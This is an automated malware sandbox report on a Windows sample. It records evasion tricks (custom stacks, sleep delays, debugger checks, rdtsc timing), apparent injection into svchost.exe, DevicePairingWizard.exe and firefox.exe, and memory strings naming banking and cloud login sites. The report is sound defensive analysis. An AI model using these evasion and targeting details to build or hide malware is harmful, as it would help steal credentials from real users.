Source:	Binary string: wntdll.pdbUGP source: LisectAVT_2403002B_466.exe, 00000000.00000003.2038848280.0000000003490000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_466.exe, 00000000.00000003.2038136685.0000000003630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2110484222.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203306584.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203306584.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2108816255.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000003.2202437178.0000000004910000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4471467623.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4471467623.0000000004E0E000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000003.2205317854.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: LisectAVT_2403002B_466.exe, 00000000.00000003.2038848280.0000000003490000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_466.exe, 00000000.00000003.2038136685.0000000003630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2110484222.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203306584.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203306584.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2108816255.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, DevicePairingWizard.exe, 00000004.00000003.2202437178.0000000004910000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4471467623.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4471467623.0000000004E0E000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000003.2205317854.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DevicePairingWizard.pdb source: svchost.exe, 00000002.00000003.2170966741.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171044272.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000003.00000002.4470522322.00000000012F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: DevicePairingWizard.exe, 00000004.00000002.4472629196.000000000529C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E2C000.00000004.00000020.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2542910321.0000000032B7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: DevicePairingWizard.exe, 00000004.00000002.4472629196.000000000529C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E2C000.00000004.00000020.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2542910321.0000000032B7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: DevicePairingWizard.pdbGCTL source: svchost.exe, 00000002.00000003.2170966741.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171044272.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000003.00000002.4470522322.00000000012F8000.00000004.00000020.00020000.00000000.sdmp

Source: LisectAVT_2403002B_466.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LisectAVT_2403002B_466.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LisectAVT_2403002B_466.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LisectAVT_2403002B_466.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LisectAVT_2403002B_466.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E9C304 LoadLibraryA,GetProcAddress,

0_2_00E9C304

Source: LisectAVT_2403002B_466.exe

Static PE information: real checksum: 0x123160 should be: 0x123169

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E48B85 push ecx; ret	0_2_00E48B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004198E8 push ss; ret	2_2_004198EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F942 push eax; ret	2_2_0042F944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041610D push 00000075h; iretd	2_2_0041611A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402477 pushad ; retf	2_2_00402478
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E42B push 86BACAFEh; retf	2_2_0040E430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403640 push eax; ret	2_2_00403642
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00415744 pushfd ; iretd	2_2_0041575A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CF63 push ss; retf EBDAh	2_2_0042D01B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041577F pushfd ; iretd	2_2_0041575A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041BF1E push eax; iretd	2_2_0041BF21
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A7B4 push esi; ret	2_2_0040A7BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C7BC push ecx; retf	2_2_0041C7BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320225F pushad ; ret	2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032027FA pushad ; ret	2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx	2_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320283D push eax; iretd	2_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320135E push eax; iretd	2_2_03201369
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04C727FA pushad ; ret	4_2_04C727F9
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04C7225F pushad ; ret	4_2_04C727F9
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04C7283D push eax; iretd	4_2_04C72858
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CA09AD push ecx; mov dword ptr [esp], ecx	4_2_04CA09B6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B1213C pushfd ; iretd	4_2_00B12117
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B12101 pushfd ; iretd	4_2_00B12117
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B162A5 push ss; ret	4_2_00B162A7
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B2C2FF push eax; ret	4_2_00B2C301
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B24480 push edi; iretd	4_2_00B2448A
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B188DB push eax; iretd	4_2_00B188DE
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B12ACA push 00000075h; iretd	4_2_00B12AD7
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B07171 push esi; ret	4_2_00B07179
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B19179 push ecx; retf	4_2_00B1917B

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E24A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00E24A35
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00EA55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00EA55FD

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E433C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00E433C7

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	API/Special instruction interceptor: Address: 19133C4
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Window / User API: threadDelayed 5008			Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Window / User API: threadDelayed 4965			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-100496

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 1.3 %
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	API coverage: 2.5 %

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 1012	Thread sleep count: 5008 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 1012	Thread sleep time: -10016000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 1012	Thread sleep count: 4965 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe TID: 1012	Thread sleep time: -9930000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe TID: 4564	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe TID: 4564	Thread sleep time: -43500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe TID: 4564	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe TID: 4564	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E84696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00E84696
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00E8C9C7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8C93C FindFirstFileW,FindClose,	0_2_00E8C93C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00E8F200
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00E8F35D
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00E8F65E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E83A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00E83A2B
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E83D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00E83D4E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00E8BF27
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B1D460 FindFirstFileW,FindNextFileW,FindClose,	4_2_00B1D460

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E24AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00E24AFE

Source: 29mFDn2J0.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 29mFDn2J0.4.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 29mFDn2J0.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 29mFDn2J0.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 29mFDn2J0.4.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 29mFDn2J0.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: ljryBmFNsYlm.exe, 00000006.00000002.4470978277.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: 29mFDn2J0.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 29mFDn2J0.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 29mFDn2J0.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 29mFDn2J0.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 29mFDn2J0.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 29mFDn2J0.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 29mFDn2J0.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 29mFDn2J0.4.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 29mFDn2J0.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E2C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2544885842.000001CFB2ACD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 29mFDn2J0.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 29mFDn2J0.4.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 29mFDn2J0.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 29mFDn2J0.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 29mFDn2J0.4.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 29mFDn2J0.4.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 29mFDn2J0.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 29mFDn2J0.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 29mFDn2J0.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 29mFDn2J0.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 29mFDn2J0.4.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 29mFDn2J0.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 29mFDn2J0.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 29mFDn2J0.4.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 29mFDn2J0.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 29mFDn2J0.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	API call chain: ExitProcess graph end node			graph_0-97918
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	API call chain: ExitProcess graph end node			graph_0-99046

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00419083 LdrLoadDll,

2_2_00419083

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E941FD BlockInput,

0_2_00E941FD

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E23B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00E23B4C

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E55CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00E55CCC

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E9C304 LoadLibraryA,GetProcAddress,

0_2_00E9C304

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_01913690 mov eax, dword ptr fs:[00000030h]	0_2_01913690
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_01913630 mov eax, dword ptr fs:[00000030h]	0_2_01913630
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_01911ED0 mov eax, dword ptr fs:[00000030h]	0_2_01911ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]	2_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]	2_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]	2_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]	2_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]	2_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]	2_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
